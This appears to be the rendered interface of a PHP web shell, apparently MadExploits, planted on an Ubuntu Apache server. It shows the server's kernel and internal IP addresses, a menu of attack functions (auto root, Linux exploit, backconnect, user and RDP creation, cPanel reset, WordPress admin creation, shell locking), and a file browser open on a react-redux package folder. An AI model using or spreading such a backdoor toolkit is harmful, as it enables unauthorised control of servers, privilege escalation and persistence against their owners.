Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
react-redux /
es /
[ HOME SHELL ]
Name
Size
Permission
Action
components
[ DIR ]
drwxrwxr-x
connect
[ DIR ]
drwxrwxr-x
hooks
[ DIR ]
drwxrwxr-x
utils
[ DIR ]
drwxrwxr-x
alternate-renderers.d.ts
101
B
-rw-rw-r--
alternate-renderers.js
897
B
-rw-rw-r--
exports.d.ts
1.45
KB
-rw-rw-r--
exports.js
581
B
-rw-rw-r--
index.d.ts
128
B
-rw-rw-r--
index.js
908
B
-rw-rw-r--
next.d.ts
128
B
-rw-rw-r--
next.js
948
B
-rw-rw-r--
types.d.ts
4.73
KB
-rw-rw-r--
types.js
10
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : exports.d.ts
import Provider from './components/Provider'; import type { ProviderProps } from './components/Provider'; import connect from './components/connect'; import type { Connect, ConnectProps, ConnectedProps } from './components/connect'; import type { SelectorFactory, Selector, MapStateToProps, MapStateToPropsFactory, MapStateToPropsParam, MapDispatchToPropsFunction, MapDispatchToProps, MapDispatchToPropsFactory, MapDispatchToPropsParam, MapDispatchToPropsNonObject, MergeProps } from './connect/selectorFactory'; import { ReactReduxContext } from './components/Context'; import type { ReactReduxContextValue } from './components/Context'; import { useDispatch, createDispatchHook } from './hooks/useDispatch'; import { useSelector, createSelectorHook } from './hooks/useSelector'; import { useStore, createStoreHook } from './hooks/useStore'; import shallowEqual from './utils/shallowEqual'; import type { Subscription } from './utils/Subscription'; export * from './types'; export type { ProviderProps, SelectorFactory, Selector, MapStateToProps, MapStateToPropsFactory, MapStateToPropsParam, Connect, ConnectProps, ConnectedProps, MapDispatchToPropsFunction, MapDispatchToProps, MapDispatchToPropsFactory, MapDispatchToPropsParam, MapDispatchToPropsNonObject, MergeProps, ReactReduxContextValue, Subscription, }; export { Provider, ReactReduxContext, connect, useDispatch, createDispatchHook, useSelector, createSelectorHook, useStore, createStoreHook, shallowEqual, };
Close